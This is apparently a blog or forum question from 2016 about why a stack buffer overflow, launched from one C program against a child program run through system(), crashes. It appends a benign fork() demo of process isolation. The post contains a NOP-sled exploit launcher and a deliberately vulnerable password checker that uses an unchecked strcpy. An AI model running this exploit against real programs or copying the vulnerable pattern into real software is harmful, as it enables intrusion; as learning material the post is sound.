Friday, 24 June 2016

How to access address space of parent process from child process?

I am executing a program B from the main function of another program A using the C library function system(). But when I pass an address from A to B as an argument, to replace the return address in process B through a buffer overflow, it shows a segmentation fault.

I know each process cannot access the address space of another process. But is there any way I can buffer overflow the child process so that execution returns to the parent process? I am using an x64 machine and gcc with the -m32 and -fno-stack-protector options.

This is the program A from where I am executing another program B:

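#include <stdio.h>
#include <stdlib.h>   // malloc, free, atoi, system
#include <string.h>   // strcpy, strlen, strcat, memset
#include <strings.h>  // bzero

int main(int argc, char *argv[]) {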
   unsigned int i, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./child '"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // add NOP instructions

   strcat(command, "'");

   system(command); // run another program
   free(command);
}

And this is the other program B, which is vulnerable to buffer overflow:

#include <stdio.h>
#include <string.h>   // strcpy, strcmp

int testAuthenetication(char *password){
    int value = 0;
    char buffer[8];

    strcpy(buffer, password);

    if(strcmp(buffer, "abcd") == 0){
        value = 1;
    }
    if(strcmp(buffer, "abcdef") == 0){
        value = 1;
    }

    return value;
}

int main(int argc, char *argv[]){
    if(argc < 2){
        printf("Enter the password \n");
        return 0;
    }

    if(testAuthenetication(argv[1])){
        printf("Access Granted \n");
    }
    else{
        printf("Access denied \n");
    }
    return 0;
}
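
The process isolation the question mentions, as an added example that is not part of the original post: after fork() the child sees a variable at the same virtual address as the parent, yet a write through that address never reaches the parent's memory. system() goes one step further, because the child then calls exec and its memory image is replaced entirely, so an address taken in A does not refer to A's data or code inside B. The names run_isolation_demo, isolation_result and marker are hypothetical; a POSIX system is assumed.

```c
#include <stdio.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical names, chosen for this example only. */
struct isolation_result {
    uintptr_t parent_addr, child_addr; /* address of `marker` in each process */
    int parent_value, child_value;     /* contents of `marker` after the child's write */
    int ok;                            /* 1 if the experiment ran to completion */
};

static int marker = 0x41;

struct isolation_result run_isolation_demo(void) {
    struct isolation_result r = {0};
    uintptr_t report[2] = {0, 0};
    int fds[2];

    if (pipe(fds) != 0)
        return r;
    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]); close(fds[1]);
        return r;
    }
    if (pid == 0) {                    /* child: private copy of the parent's memory */
        marker = 0x42;                 /* write lands in the child's copy only */
        report[0] = (uintptr_t)&marker;
        report[1] = (uintptr_t)marker;
        ssize_t w = write(fds[1], report, sizeof report);
        _exit(w == (ssize_t)sizeof report ? 0 : 1);
    }
    close(fds[1]);                     /* parent: read the child's report */
    ssize_t n = read(fds[0], report, sizeof report);
    close(fds[0]);
    waitpid(pid, NULL, 0);

    r.parent_addr = (uintptr_t)&marker;
    r.child_addr = report[0];
    r.parent_value = marker;           /* still 0x41: the child's write is invisible here */
    r.child_value = (int)report[1];
    r.ok = (n == (ssize_t)sizeof report);
    return r;
}

int main(void) {
    struct isolation_result r = run_isolation_demo();
    printf("parent: &marker=%#lx value=%#x\n", (unsigned long)r.parent_addr, r.parent_value);
    printf("child : &marker=%#lx value=%#x\n", (unsigned long)r.child_addr, r.child_value);
    return r.ok ? 0 : 1;
}
```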
